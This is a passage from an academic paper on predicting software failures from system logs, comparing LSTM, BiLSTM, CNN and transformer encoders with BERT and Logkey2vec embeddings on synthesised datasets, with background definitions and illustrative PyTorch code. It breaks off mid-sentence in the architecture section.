\(>350\) or a failure percentage \(>7.5\%\), under which this configuration demonstrates high accuracy for failure prediction. **Keywords:** Logs, Failure Prediction, Deep Learning, Embedding Strategy, Synthesised Data Generation, Systematic Evaluation Introduction As software systems continue to increase in complexity and scope, reliability and availability play a critical role in quality assurance and software maintenance [1, 32]. During runtime, software systems often record log data about their execution, designed to help engineers monitor the system's behavior [22]. One important quality assurance activity is to predict failures at run time based on log analysis, as early as possible before they occur, to enable corrective actions and minimise the risk of system disruptions [5]. However, software systems typically generate a vast quantity of log data which makes manual analysis error-prone and extremely time-consuming. Therefore, a number of automatic log analysis methods, particularly for failure prediction [13, 12, 46] and anomaly detection [18, 38, 60], have been proposed over the past few years. Machine Learning (ML) has played a key role in automatic log analysis, from Traditional ML methods (e.g., Random Forest (RF) [3], Support Vector Machine (SVM) [11], Gradient Boosting (GB) [6]) to Deep Learning (DL) methods (e.g., DeepLog [18], LogRobust [60], LogBERT [21]) relying on various DL network architectures, including Long Short-Term Memory (LSTM), Convolutional Neural Network (CNN), and transformers [32]. Although several studies have explored the use of DL models with various log sequence embedding strategies [22], they have been limited in terms of evaluating the three main types of DL networks--RNN, CNN, and transformer--combined with different embedding strategies; for instance, two studies by Le and Zhang [32] and Lu et al. [36] included CNN-based models but did not cover transformer-based models. 
Moreover, previously studied models were often applied to a limited number of available datasets, which severely limited the generalizability of results [22]. Indeed, because these few datasets exhibit a limited variety of characteristics, studying the robustness and generalizability of DL models, along with their embedding strategies, is unlikely to yield practical guidelines. In this paper, we aim to systematically investigate the combination of the main DL architectures and embedding strategies, based on datasets whose main characteristics (e.g., dataset size and failure percentage) are controlled. To achieve this, we first introduce a modular architecture for failure prediction, where alternative log embedding strategies and DL models can be easily applied. The architecture consists of two major steps: an embedding step that converts input logs into log embedding vectors, followed by a classification step that predicts failures by processing the embedding vectors using encoders configured with different DL models, called DL encoders. In the embedding step, two alternative strategies, i.e., the pretrained BERT [15] and the trainable Logkey2vec [36], are considered. In the classification step, four types of DL models, including LSTM [23], BiLSTM [48], CNN [42], and transformer [53], with an attention mechanism [53] for BiLSTM and transformer, are used. Also, to address the issue of the limited availability of adequate datasets, we designed a rigorous approach for generating synthesised data relying on behavioral models built by applying model inference algorithms [49, 54] to available system logs. When synthesizing data, we control key dataset characteristics such as the size of the dataset and the percentage of failures. Additionally, we define patterns that are associated with system failures and are used to classify logs for the failure prediction task. The goal is to associate failures with complex patterns that are challenging for failure prediction models. Further, we investigated how dataset characteristics determine the accuracy of model predictions and derived practical guidelines accordingly. Our empirical results show that the best model combines the improved CNN-based encoder with Logkey2vec as the embedding strategy. Experiments with a wide variety of datasets showed that this combination is also very accurate when certain conditions are met in terms of dataset size and failure percentage. To summarise, the main contributions of this paper are:
* A large-scale, systematic investigation of the application of various DL encoders (LSTM-, BiLSTM-, CNN-, and transformer-based) and embedding strategies (BERT [15] and Logkey2vec [36]) for failure prediction modeling.
* A systematic and automated approach to synthesise log data, with a focus on experimentation in the area of failure prediction, to enable the control of key dataset characteristics while avoiding any other form of bias.
* Practical guidelines for using DL-based failure prediction models depending on dataset characteristics such as dataset size and failure rates.
* A publicly available replication package, containing the implementation, generated datasets with behavioural models, and results.
The rest of the paper is organised as follows. Section 2 presents the basic definitions and concepts that will be used throughout the paper. Section 3 illustrates related work. Section 4 describes the architecture of our failure predictor with its different configuration options. 
Section 5 describes our research questions, empirical methodology, and synthetic log data generation. Section 6 reports empirical results. Section 7 discusses the implications of the results. Section 8 concludes the paper and suggests future directions for research and improvements. ## 2 Background In this section, we provide background information on the main concepts and techniques that will be used throughout the paper. First, we briefly introduce the concepts related to finite state automata (FSA) and regular expressions in SS 2.1 and execution logs in SS 2.2. We then describe two important log analysis tasks (anomaly detection and failure prediction) in SS 2.3 and further review machine-learning (ML)-based approaches for performing such tasks in SS 2.4. We conclude by providing an overview of embedding strategies for log-based analyses in SS 2.5. ### Finite State Automata and Regular Expressions A _deterministic FSA_ is a tuple \(\mathcal{M}=\langle Q,A,q_{0},\Sigma,\delta\rangle\), where \(Q\) is a finite set of states, \(A\subseteq Q\) is the set of accepting states, \(q_{0}\in Q\) is the starting state, \(\Sigma\) is the alphabet of the automaton, and \(\delta\colon Q\times\Sigma\to Q\) is the transition function. The extended transition function \(\delta^{*}:Q\times\Sigma^{*}\to Q\), where \(\Sigma^{*}\) is the set of strings over \(\Sigma\), is defined as follows: 1. For every \(q\in Q,\delta^{*}(q,\epsilon)=q\), where \(\epsilon\) represents the empty string; 2. For every \(q\in Q\), every \(y\in\Sigma^{*}\), and every \(\sigma\in\Sigma\), \(\delta^{*}(q,y\sigma)=\delta(\delta^{*}(q,y),\sigma)\). Let \(x\in\Sigma^{*}\); the string \(x\) is accepted by \(\mathcal{M}\) if \(\delta^{*}(q_{0},x)\in A\) and is rejected by \(\mathcal{M}\), otherwise. The language accepted by an FSA \(\mathcal{M}\) is denoted by \(\mathcal{L}(\mathcal{M})\) and is defined as the set of strings that are accepted by \(\mathcal{M}\); more formally, \(\mathcal{L}(\mathcal{M})=\{w\mid\delta^{*}(q_{0},w)\in A\}\). A language accepted by an FSA is called a _regular_ language. Regular languages can also be defined using _regular expressions_; given a regular expression \(r\) we denote by \(\mathcal{L}(r)\) the language it represents. A regular expression \(r\) over an alphabet \(\Sigma\) is a string containing symbols from \(\Sigma\) and special meta-symbols like "\(|\)" (union or alternation), "." (concatenation), and "*" (Kleene closure or star), defined recursively using the following rules: 1. \(\emptyset\) is a regular expression denoting the empty language \(\mathcal{L}(\emptyset)=\emptyset\); 2. For every \(a\in\Sigma\), \(a\) is a regular expression corresponding to the language \(\mathcal{L}(a)=\{a\}\); 3. If \(s\) and \(t\) are regular expressions, then \(r=s|t\) and \(r=s.t\) (or \(r=st\)) are regular expressions denoting, respectively, the union and the concatenation of \(\mathcal{L}(s)\) and \(\mathcal{L}(t)\); 4. If \(s\) is a regular expression, then \(r=s^{*}\) is a regular expression denoting the Kleene closure of \(\mathcal{L}(s)\). ### Logs In general, a _log_ is a sequence of log messages generated by logging statements (e.g., printf(), logger.info()) in the source code [22]. A _log message_ is textual data composed of a _header_ and _content_[22]. In practice, the logging framework determines the _header_ (e.g., INFO) while the _content_ is designed by developers and is composed of static and dynamic parts. 
The static parts are the fixed text written by the developers in the logging statement (e.g., to describe a system event), while the dynamic parts are determined by expressions (involving program variables) evaluated at runtime. For instance, let us consider the execution of the log printing statement logger.info("Received block_" + block_ID); during the execution, assuming variable block_ID is equal to 2, the log message Received block 2 is printed. In this case, Received block_ is the static part while 2 is the dynamic part, which changes depending on the value of block_ID at run time. A _log template_ (also called _event template_ or _log key_) is an abstraction of the log message content, in which dynamic parts are masked with a special symbol (e.g., *); for example, the log template corresponding to the above log message is Received block_*. Often, each unique log template is identified by an ID number for faster analysis and efficient data storage. A _log sequence_ is a fragment of a log, i.e., a sequence of log messages contained in a log; in some cases, it is convenient to abstract log sequences by replacing the log messages with their log templates. Log sequences are obtained by partitioning logs based on either log message identifiers (e.g., session IDs) or log timestamps (e.g., by extracting consecutive log messages using a fixed/sliding window). For a log sequence \(l\), \(|l|\) indicates the length of the log sequence, i.e., the number of elements (either log templates or log messages), not necessarily unique, inside the sequence. Figure 1 shows an example summarizing the aforementioned concepts. On the left side, the first three log messages are partitioned (using a fixed window of size three) to create a log sequence. The first message in the log sequence (_LogMessage1_) is 0142 info: sent block 4 in 12.2.1. It is decomposed into the header 0142 info and the content sent block 4 in 12.2.1. The log template for the content is sent block * in *; the dynamic parts are 4 and 12.2.1.
Figure 1: An example illustrating the concepts of log, log message, log template, and log sequence
### Log Analysis Tasks In the area of log analysis, several major tasks for reliability engineering, such as anomaly detection and failure prediction, have been automated [22]. #### 2.3.1 Anomaly Detection Anomaly detection is the task of identifying anomalous patterns in log data that do not conform to expected system behaviors [22], indicating possible errors, faults, or failures in software systems. To automate the task of anomaly detection, log data is often partitioned into smaller log sequences. This partitioning is typically based on log identifiers (e.g., _session_ID_ or _block_ID_), which correlate log messages within a series of operations; alternatively, when log identifiers are not available, timestamp-based fixed/sliding windows are also used. Labeling of partitions is then required, each partition usually being labeled as an anomaly either when an error, unknown, or failure message appears in it or when the corresponding log identifier is marked as anomalous. Otherwise, it is labeled as normal. #### 2.3.2 Failure Prediction Failure prediction attempts to proactively generate early alerts to prevent failures, which often lead to unrecoverable outages [22]. Similar to anomaly detection, log data is often partitioned into sequences using log identifiers. Partitioned log sequences are labeled as failures according to mechanisms that are specific to the application being monitored. A small illustrative sketch of template extraction, identifier-based partitioning, and labeling is given below. 
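The following sketch is illustrative only (the messages, masking rules, and error templates are made-up assumptions, not the tooling used in this paper): it masks dynamic parts to obtain log templates, partitions messages into log sequences by block identifier, and labels each sequence based on the presence of an error template.

```python
import re
from collections import defaultdict

# Hypothetical raw log messages: (block_id, content) pairs
messages = [
    ("blk_1", "Received block 4 in 12.2.1"),
    ("blk_2", "Received block 7 in 10.0.3"),
    ("blk_1", "Sent block 4 in 12.2.1"),
    ("blk_2", "Exception while serving block 7"),
]

def to_template(content):
    """Mask dynamic parts (version/IP-like tokens, plain numbers) with '*'."""
    content = re.sub(r"\d+(\.\d+)+", "*", content)
    return re.sub(r"\b\d+\b", "*", content)

# Assumed set of templates that indicate an error/failure, used for labeling
ERROR_TEMPLATES = {"Exception while serving block *"}

# Partition by identifier and abstract each message to its template
sequences = defaultdict(list)
for block_id, content in messages:
    sequences[block_id].append(to_template(content))

labels = {bid: int(any(t in ERROR_TEMPLATES for t in seq)) for bid, seq in sequences.items()}
print(dict(sequences))  # {'blk_1': ['Received block * in *', 'Sent block * in *'], ...}
print(labels)           # {'blk_1': 0, 'blk_2': 1}
```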
Like for anomalies, failures can be associated with complex patterns in log sequences. ### DL Techniques in Log Analysis In recent years, a variety of deep learning (DL) techniques have been applied to log analysis, and more specifically to failure prediction and anomaly detection. Compared to traditional ML techniques such as Random Forests (RF) and K-nearest Neighbours (KNN), DL techniques incrementally learn high-level features from data, removing the need for complex feature extraction activities based on domain expertise. According to Le and Zhang [32], there are three main categories of DL approaches in log analysis: (1) Recurrent Neural Network (RNN), (2) Convolutional Neural Network (CNN), and (3) transformer. In each category, different variations can be adopted; for instance, Long Short-Term Memory networks (LSTM) and Bidirectional Long Short-Term Memory networks (BiLSTM), which fall into the RNN category, have been repeatedly used for anomaly detection and failure prediction [18, 12, 60]. We now explain the major features of each category as well as their variations. #### 2.4.1 Rnn LSTM [24, 19] is an RNN-based model commonly used in both anomaly detection and failure prediction [18, 12]. An LSTM network consists of multiple units, each of which is composed of a cell, an input gate, an output gate [24], and a forget gate [19]. An LSTM-based model reads an input sequence \((x_{1},\ldots,x_{n})\) and produces a corresponding sequence \((y_{1},\ldots,y_{n})\) with the same length. At each time step \(t>1\), an LSTM unit reads the input \(x_{t}\) as well as the previous hidden state \(h_{t-1}\) and the previous memory \(c_{t-1}\) to compute the hidden state \(h_{t}\). The hidden state is employed to produce an output at each step. The memory cell \(c_{t}\) is updated at each time step \(t\) by partially forgetting old, irrelevant information and accepting new input information. The forget gate \(f_{t}\) is employed to control the amount of information to be removed from the previous context (i.e., \(c_{t-1}\)) in the memory cell \(c_{t}\). As a recurrent network, an LSTM shares the same parameters across all steps, which reduces the total number of parameters to learn. Learning is achieved by minimizing the error between the actual output and the predicted output. Moreover, to improve the regularization of an LSTM-based model, a dropout layer is applied between LSTM layers. It randomly drops some connections between memory cells by masking their value. LSTM-based models have shown significant performance in several studies in log-based failure prediction and anomaly detection [38, 39, 13, 12]. BiLSTM is an extension of the traditional LSTM [26]. Unlike LSTM, BiLSTM reads the sequence in both directions, enabling it to comprehend the relationships between the previous and the upcoming inputs. To make this possible, a BiLSTM network is composed of two layers of LSTM nodes, whereby each of these layers learns from the input sequence in the opposite direction. At time step \(t\), the output \(h_{t}\) is calculated by concatenating \(h_{t}^{f}\) (the hidden states in a forward pass) and \(h_{t}^{b}\) (the hidden states in a backward pass). By allowing this bi-directional computation, BiLSTM is able to capture complex dependencies and produce more accurate predictions. The BiLSTM-based model has achieved accurate results for anomaly detection [60]. 
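The forward/backward concatenation described above can be illustrated with a few lines of PyTorch (an assumed sketch with placeholder dimensions, not the exact encoder configuration evaluated later in this paper):

```python
import torch
import torch.nn as nn

# A batch of 4 embedded log sequences of length 50, each element a 768-dimensional vector
x = torch.randn(4, 50, 768)

lstm = nn.LSTM(input_size=768, hidden_size=128, batch_first=True)
bilstm = nn.LSTM(input_size=768, hidden_size=128, batch_first=True, bidirectional=True)

out_f, _ = lstm(x)      # forward-only hidden states h_t
out_bi, _ = bilstm(x)   # h_t = concatenation of forward h_t^f and backward h_t^b

print(out_f.shape)   # torch.Size([4, 50, 128])
print(out_bi.shape)  # torch.Size([4, 50, 256]) -- twice the hidden size
```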
#### 2.4.2 Cnn CNN is a neural network primarily employed for image recognition [42]. It has a unique architecture designed to handle 2D and 3D input data such as images and matrices. A CNN leverages convolutional layers to perform feature extraction and pooling layers to downsample the input. The 1D convolutional layer uses a set of filters to perform a convolution operation with the 2D input data to produce a set of feature maps (CNN layer output). According to Kim [29], let \(w\in R^{k\times d}\) be a filter which is applied to a window of \(k\) elements in a \(d\)-dimension input log sequence, and let \(x_{i}\) represent the \(i\)-th element in the sequence. A feature \(c_{i}\in R\) is calculated as \(c_{i}=\sigma(w\cdot x_{i:i+k-1}+b)\), where \(\sigma\) is the activation function (i.e., ReLU), \(x_{i:i+k-1}\) represents the concatenation of elements \(\{x_{i},x_{i+1},...,x_{i+k-1}\}\), and \(b\in R\) denotes a bias term. After this filter is applied to each window in the sequence (\(\{x_{1:k},x_{2:k+1},...,x_{n-k+1:n}\}\)), a feature map \(c=[c_{1},c_{2},...,c_{n-k+1}]\) is produced, where \(c\in R^{n-k+1}\). Parameter \(k\) represents the kernel size; it is an important parameter of the operation. Note that there is no padding added to the input sequence, leading to feature maps smaller than the input sequence. Padding is a technique employed to add zeros to the beginning and/or end of the sequence; it allows for more space for the filter to cover, controlling the size of the output feature maps. Padding is commonly used so that the output feature map has the same length as the input sequence [10]. The pooling layer reduces the spatial dimensions of the feature maps extracted by the convolutional layer and simplifies the computational complexity of the network. Recently, CNNs have shown high-accuracy performance in anomaly detection [36]. #### 2.4.3 Transformer The transformer is a type of neural network architecture designed for natural language processing tasks, introduced by Vaswani et al. [53]. The main innovation of transformers is the self-attention mechanism. More important parts of the input receive higher attention, which facilitates learning the contextual relationships from the input data. This is implemented by calculating a weight for each input element, which represents the importance of that element with respect to the adjacent elements. Hence, a model with self-attention (not necessarily a transformer) can capture long-range dependencies in the input. Since transformers do not process inputs sequentially like LSTMs, positional encoding is needed. Positional encoding vectors are fixed-size vectors added to the input to provide information about the position of each element in the input sequence. Further, a transformer involves a stack of multiple transformer blocks. Each block contains a self-attention layer and a feed-forward neural network layer. In the self-attention layer, the model computes attention scores (weights) for each element, allowing it to capture the relationship between all input elements. The feed-forward layer is used to transform the representation learned by the self-attention layer into a new representation entering the next transformer block. In the area of log analysis, transformers have been recently applied in a few studies on anomaly detection [31, 25, 21, 41], showing outstanding performance. 
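The following short PyTorch sketch (an assumed illustration with placeholder dimensions, not this paper's implementation) makes the two mechanisms above concrete: a 1D convolution whose kernel size and padding determine the feature-map length, and a single transformer block applied to an embedded log sequence.

```python
import torch
import torch.nn as nn

n, d, k = 50, 768, 3          # sequence length, embedding size, kernel size
x = torch.randn(1, d, n)      # Conv1d expects (batch, channels=d, length=n)

conv_valid = nn.Conv1d(in_channels=d, out_channels=1, kernel_size=k)                 # no padding
conv_same = nn.Conv1d(in_channels=d, out_channels=1, kernel_size=k, padding="same")  # zero padding

c_valid = torch.relu(conv_valid(x))   # feature map c = [c_1, ..., c_{n-k+1}]
c_same = torch.relu(conv_same(x))     # feature map with the same length as the input

print(c_valid.shape)  # torch.Size([1, 1, 48]) -- n - k + 1
print(c_same.shape)   # torch.Size([1, 1, 50])

# One transformer block (self-attention + feed-forward); positional encoding is omitted here
block = nn.TransformerEncoderLayer(d_model=d, nhead=8, batch_first=True)
print(block(torch.randn(1, n, d)).shape)  # torch.Size([1, 50, 768])
```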
### Log Sequence Embedding Strategies When analyzing log sequences, the textual data of log sequences' elements must be converted into a vector representation that is understandable by a machine; such a conversion is called the _log sequence embedding_. Generally, there are two main approaches for doing this: 1) based on count vectors [14] or ID numbers of the sequence elements, or 2) based on the contextual information of sequence elements. Here, we cover one widely used example for each case in the following sections. #### 2.5.1 Logkey2vec There are many studies that have achieved high accuracy results by using log embedding strategies that rely on the ID numbers or count vectors of log sequence elements [58]. Advantages include the speed of processing and model simplicity since text preprocessing (e.g., tokenization) is not required. Similar to methods like word2vec [40], which assigns a unique vector to each different word based on a context mapping table, Logkey2vec maps each unique log template ID to a vector representation. While Word2vec is a pre-trained tool, Logkey2vec is a trainable layer implemented inside a neural network. It relies on a matrix called "codebook", where the number of rows is the vocabulary size and the number of columns is the embedding vector size of each log template ID. The embedding vectors are first initialised by random numbers and are improved through backpropagation during training. For a log sequence, Logkey2vec computes the embedding vector of each log template based on its log template ID; each row of the matrix represents the whole log sequence. #### 2.5.2 Bert In the past few years, Bidirectional Encoder Representations from Transformers (BERT) has provided significant improvements in the semantic embedding of textual information by taking the contextual information of text into account. It has been used in a few studies in log-based anomaly detection [21, 31]. This model fares better than the other pretrained transformer-based models: GPT2 [45] and RoBERTa [35] in log sequence embedding [31]. The pre-trained BERT base model [15] provides the embedding matrix of log sequences where each row is the representation vector of its corresponding log template inside the sequence. The BERT model is applied to each log template separately and then the representation is aggregated inside a matrix. To embed the information of a log template into a 768-sized vector, the BERT model first tokenizes the log template text. BERT tokenizer uses WordPiece [56], which is able to handle out-of-vocabulary (OOV) words to reduce the vocabulary size. Further, the tokens are fed to the 12 layers of BERT's transformer encoder. After obtaining the output vectors of a log template's tokens, the log template embedding is calculated by getting the average of output vectors. This process is repeated for all the log templates inside the log sequence to create an \(n\times 768\) matrix representation where \(n\) is the size of the log sequence. ## 3 Related Work There are several papers reporting empirical studies of different DL-based methods for log-based anomaly detection and failure prediction. In our review, we include studies that covered more than one DL model, possibly based on the same DL type; given our focus, non-DL models such as RF, SVM, and clustering are not included. The main studies are summarised in Table 1. Column "DL Type(s)" indicates the type of DL network covered in each paper. 
We indicate the Log Sequence Embedding (LSE) strategies, introduced in SS 2.5, in the next column; notice there are a few models not using LSE, such as DeepLog [18]. Column "Dataset(s)" indicates which datasets (whether existing datasets or synthesised ones) were used in the studies. Column "DataSet Char Control" indicates whether the dataset characteristics were controlled during the experiment and lists such characteristics. In the last column, the labeling scheme indicates the applied method(s) for log partitioning, as mentioned in SS 2.2, based on either a log identifier or timestamp (represented by \(L\) and \(T\), respectively).

| **Paper** | **DL Type(s)** | **LSE Strategy(ies)** | **Dataset(s)** | **DataSet Char Control** | **Labeling Scheme** |
| --- | --- | --- | --- | --- | --- |
| Lu et al. [36] | LSTM, CNN, MLP | Logkey2vec | HDFS | No | L |
| Meng et al. [38] | LSTM | Template2Vec | HDFS, BGL | No | T, L |
| Das et al. [13] | LSTM | - | Clay-HPC | No | L |
| Huang et al. [25] | LSTM, BiLSTM, Transformer | TF-IDF-based, Log Encoder | HDFS, BGL, OpenStack | Yes (unstable log injection ratio) | T, L |
| Yang et al. [59] | LSTM, BiLSTM, GRU | Template2Vec, TF-IDF | HDFS, BGL | No | T, L |
| Guo et al. [21] | LSTM, Transformer | Template2Vec, Embedding Matrix | HDFS, BGL, Thunderbird | No | T, L |
| Le and Zhang [31] | LSTM, BiLSTM, Transformer | Log2Vec*, TF-IDF, BERT | HDFS, BGL, Spirit, Thunderbird | No | T, L |
| Le and Zhang [32] | LSTM, BiLSTM, GRU, CNN | Template2Vec, Logkey2vec, TF-IDF | HDFS, BGL, Spirit, Thunderbird | Yes (class distribution, data noise, partitioning methods) | |
| Our Study** | LSTM, BiLSTM, CNN, Transformer | BERT, Logkey2vec | Synthesized Data | Yes (Dataset size, Failure Percentage, LSL, Failure Pattern type) | |

*: we highlight that Log2Vec is different than Logkey2vec, a log sequence embedding strategy (see § 2.5.1)
**: further discussed in § 7
Table 1: Overview of Related Empirical Studies

We now briefly explain the papers, with the aim of motivating our study and highlighting the differences. We note that, unless we mention it, LSE strategies are implemented specifically for one DL model (combinations are not explored). Indeed, many of the reported techniques tend to investigate one such combination or simply do not rely on any embedding strategy. The studies are listed in chronological order. Lu et al. [36] (2018) introduced CNN for anomaly detection as well as the Logkey2vec embedding strategy (see SS 2.5.1). They compared it to LSTM and MLP networks, also relying on the Logkey2vec embedding strategy. Meng et al. [38] (2019) developed LogAnomaly, an LSTM-based model, using their proposed embedding strategy, Template2Vec (a log-specific variant of Word2Vec). Das et al. [13] (2020) introduced a state-of-the-art LSTM-based model, Aarohi, for predicting failures using log data and compared it to two LSTM-based models, Dash [12] and DeepLog [18], with a focus on online prediction efficiency. None of these techniques relies on a log embedding strategy. The first study considering transformers in their DL comparison is by Huang et al. 
[25] (2020), featuring three DL models: HitAnomaly (transformer-based), LogRobust [60] (BiLSTM-based), and DeepLog (LSTM-based). HitAnomaly utilises transformer blocks (see SS 2.4.3) as part of its LSE strategy, called Log Encoder. LogRobust employed the TF-IDF technique [28], while DeepLog did not utilise any LSE strategy. The authors also controlled dataset characteristics by manipulating the unstable log ratios. Yang et al. [59] (2021) proposed the GRU-based [9] PLELog and compared it to LogRobust and DeepLog. PLELog used the TF-IDF technique, similar to LogRobust. Guo et al. [21] (2021) proposed a transformer-based model, LogBERT, and compared its performance with two LSTM-based models, LogAnomaly and DeepLog. LogBERT uses an Embedding Matrix for its embedding strategy, which is similar to Logkey2vec. Le and Zhang [31] (2022) evaluated their proposed transformer-based model, Neurallog, against LogRobust (BiLSTM-based) and DeepLog (LSTM-based). The LSE strategies for the models were a pre-trained BERT (see SS 2.5.2) for Neurallog and Log2Vec [39] for DeepLog. Finally, Le and Zhang [32] (2022) conducted a comprehensive evaluation of several DL models including LSTM-based models such as DeepLog and LogAnomaly, the GRU-based model PLELog, the BiLSTM-based model LogRobust, and CNN. The study focused on various aspects including data selection, data partitioning, class distribution, data noise, and early detection ability. **Datasets.** Due to security concerns, the data sources used in many of the works in the literature, such as Clay-HPC (Clay high-performance computing (HPC) systems), are unavailable. Studies that used available datasets are limited to the following: Hadoop Distributed File System (HDFS), collected in 2009, and three HPC datasets, BGL, Spirit, and Thunderbird, collected between 2004 and 2006. In addition, the OpenStack dataset (2017) was created by injecting a limited number of anomalies at different execution points, which not only limits the diversity of anomalies but may also fail to accurately reflect real-world scenarios. **Motivating this work.** Although the above studies used various DL models (13 models), none of them covers all the main DL types: RNN, CNN, and transformer. Moreover, the LSE strategies are rarely evaluated across all the DL networks, as they are typically kept within the original model for which they were proposed. Furthermore, the investigation of various combinations of LSE strategies and DL types has been limited in existing studies; many popular models tend to adopt a fixed combination of these two elements. From Table 1 we can also see that recent studies provide incomplete evaluations of DL models, relying on a limited number of datasets that are not recent. These remarks highlight the need for a systematic and comprehensive study that 1) explores various DL types as well as their combinations with different LSE strategies; and 2) examines how various dataset characteristics affect performance. ## 4 Failure Prediction Architecture To systematically evaluate various deep learning models for failure prediction, we rely on a generic architecture that can use different modules with respect to the embedding strategy and the DL encoder. This modular architecture allows us to easily change individual modules corresponding to the various DL techniques and log sequence embedding strategies. Figure 2 depicts the modular architecture. The architecture consists of two main steps, _embedding_ and _classification_, designed to adopt different embedding as well as DL techniques, respectively. A minimal code sketch of how these two steps fit together is shown below. 
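The sketch below is illustrative only (the dimensions, the Logkey2vec-style codebook, and in particular the simple mean-pooling encoder are assumptions, not the encoders defined in SS 4.2): a trainable embedding layer maps template IDs to vectors, an encoder produces a feature vector, and an FFN followed by softmax yields the label probabilities.

```python
import torch
import torch.nn as nn

class FailurePredictor(nn.Module):
    def __init__(self, vocab_size=200, theta=768, m=128, d_f=64, d=2):
        super().__init__()
        self.codebook = nn.Embedding(vocab_size, theta)          # Logkey2vec-style trainable codebook
        self.encoder = nn.Sequential(nn.Linear(theta, m), nn.ReLU())  # placeholder encoder Phi
        self.ffn = nn.Linear(m, d_f)                              # r = max(0, z W1 + b1)
        self.out = nn.Linear(d_f, d)                              # o = r W2 + b2, then softmax

    def forward(self, template_ids):                              # template_ids: (batch, n)
        X = self.codebook(template_ids)                           # embedding step: (batch, n, theta)
        z = self.encoder(X).mean(dim=1)                           # mean-pooled feature vector (batch, m)
        r = torch.relu(self.ffn(z))
        return torch.softmax(self.out(r), dim=-1)                 # probabilities over {normal, failure}

model = FailurePredictor()
ids = torch.randint(0, 200, (4, 50))   # a batch of 4 log sequences of length 50
print(model(ids).shape)                # torch.Size([4, 2])
```

Swapping the placeholder encoder for an LSTM, BiLSTM, CNN, or transformer module yields the configurations studied in this paper.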
We note that preprocessing is not required in this architecture since log sequences are based on log templates, which are already preprocessed from log messages. In the embedding step, log sequences are given as input, and each log sequence is in the form \((x_{1},x_{2},\ldots,x_{i},\ldots,x_{n})\), where \(x_{i}\) is a log template ID and \(n\) is the length of the log sequence. An embedding technique (e.g., BERT) converts each \(x_{i}\) to a \(\theta\)-dimensional vector representing the semantics of \(x_{i}\), where \(\theta\) is the size of the log sequence embedding. Then each log sequence forms a matrix \(X\in R^{n\times\theta}\). Different log sequence embedding strategies can be applied; more information is provided in SS 4.1. In the classification step, the embedding matrix is processed to predict whether the given log sequence is a failure or not. A DL model, acting as an encoder \(\Phi\), encodes the matrix \(X\) into a feature vector \(z=\Phi(X)\in R^{m}\), where \(m\) is the number of features, which varies depending on the architecture of \(\Phi\). Different DL encoders can be applied; more information is provided in SS 4.2. Similar to related studies [25, 36], the output feature vector \(z\) is then fed to a feed-forward network (FFN) and softmax classifier to create a vector of size \(d\) (\(d=2\)), indicating the predicted label of the input. More specifically, the FFN activation function is the rectified linear unit (ReLU), and the output vector of the FFN, \(r\), is defined as \(r=max(0,zW_{1}+b_{1})\), where \(W_{1}\in R^{m\times d_{f}}\) and \(b_{1}\in R^{d_{f}}\) are trainable parameters, and \(d_{f}\) is the dimensionality of the FFN. Further, the calculation of the softmax classifier is as follows. \[o=rW_{2}+b_{2} \tag{1}\] \[\textit{softmax}(o_{p})=\frac{exp(o_{p})}{\sum_{j}exp(o_{j})} \tag{2}\] where \(W_{2}\in R^{d_{f}\times d}\) and \(b_{2}\in R^{d}\) are trainable parameters used to convert \(r\) to \(o\in R^{d}\) before applying softmax; \(o_{p}\) represents the \(p\)-th component in the \(o\) vector, and \(exp\) is the exponential function. After obtaining the softmax values, the position with the highest value determines the label of the input log sequence. Overall, the combination of an embedding strategy and a DL encoder forms a language model that takes textual data as input and transforms it into a probability distribution [53]. This language model handles the log templates as well as learning the language of failure patterns to predict the label of sequences. To train the above architecture, a number of hyper-parameters should be set, such as the choice of the optimizer, loss function, learning rate, input size (for some deep learning models), batch size, and the number of epochs. Tuning these hyper-parameters is highly recommended as it increases the chances of achieving the best failure prediction accuracy. Section 5.2.3 will detail the training and hyper-parameter tuning in our experiments. After the model is trained, it is evaluated with a test log split from the dataset with stratified sampling. We used stratified sampling to keep the same distribution of failure log sequences as the original dataset.
Figure 2: The overview of the modular architecture
Similar to the training data, the embedding step transforms the test log sequences into embedding matrices. The matrices are then fed to the trained DL encoder to predict whether log sequences are normal or not. A minimal sketch of such a training and evaluation setup is shown below. 
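The following is a minimal training sketch (illustrative assumptions throughout: random placeholder data, arbitrary learning rate and epoch count, and the simplified FailurePredictor from the sketch above rather than the tuned configurations of SS 5.2.3), using a stratified split so the test set preserves the failure percentage.

```python
import numpy as np
import torch
import torch.nn.functional as F
from sklearn.model_selection import train_test_split

# Hypothetical dataset: padded template-ID sequences of length 50 with binary labels
X = np.random.randint(0, 200, size=(1000, 50))
y = np.random.randint(0, 2, size=1000)

# Stratified split keeps the same failure percentage in train and test sets
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, stratify=y, random_state=0)
X_tr, y_tr = torch.as_tensor(X_tr), torch.as_tensor(y_tr)
X_te, y_te = torch.as_tensor(X_te), torch.as_tensor(y_te)

model = FailurePredictor()                                   # from the sketch above
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)

for epoch in range(5):                                       # illustrative number of epochs
    optimizer.zero_grad()
    probs = model(X_tr)                                      # softmax probabilities
    loss = F.nll_loss(torch.log(probs + 1e-12), y_tr)        # negative log-likelihood loss
    loss.backward()
    optimizer.step()

with torch.no_grad():
    pred = model(X_te).argmax(dim=1)
    print("test accuracy:", (pred == y_te).float().mean().item())
```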
### Embedding Strategies. While the modular architecture can accommodate various log sequence embedding options, we only selected two in order to limit the number of possible models resulting from the architecture, given our experimental constraints1. Our selection criteria aimed to include both trainable and pretrained options, as well as an advanced strategy based on transformers. Hence, given the description provided in SS 3, the "Embedding step" of our base architecture is instantiated using two strategies: BERT or Logkey2vec. The BERT sequence embedding technique is pretrained and was recently adopted for log sequences [31], while Logkey2vec is trainable and was proposed earlier [36]. Note that these two techniques were not compared in the same study before, according to Table 1. Footnote 1: More details are provided in § 5.2.1 **BERT.** The maximum number of input tokens for BERT (see SS 2.5.2) is 512 tokens. This limit does not constitute a problem in this work since the log templates in our datasets are relatively short and the total number of tokens in each log template is always less than 512. Even if log templates were longer than 512 tokens, there are related studies suggesting approaches to use BERT accordingly [55, 17, 50]. Each layer of the transformer encoder contains multi-head attention sub-layers and FFNs to compute a context-aware embedding vector (\(\theta=768\)) for each token. This process is repeated for all the log templates inside the log sequence to create a matrix representation of size \(n\times 768\), where \(n\) is the length of the input log sequence. **Logkey2vec.** For Logkey2vec (see SS 2.5.1), we set the embedding size to 768, similar to BERT, for better comparison. The vocabulary size is a parameter of Logkey2vec that is going to be set during the experiments. ### Deep Learning Encoder In this section, we illustrate the main features of the four DL encoders that can be used in the "Classification step" when instantiating our base architecture. We selected four encoders (LSTM-, BiLSTM-, CNN-, and transformer-based) because they 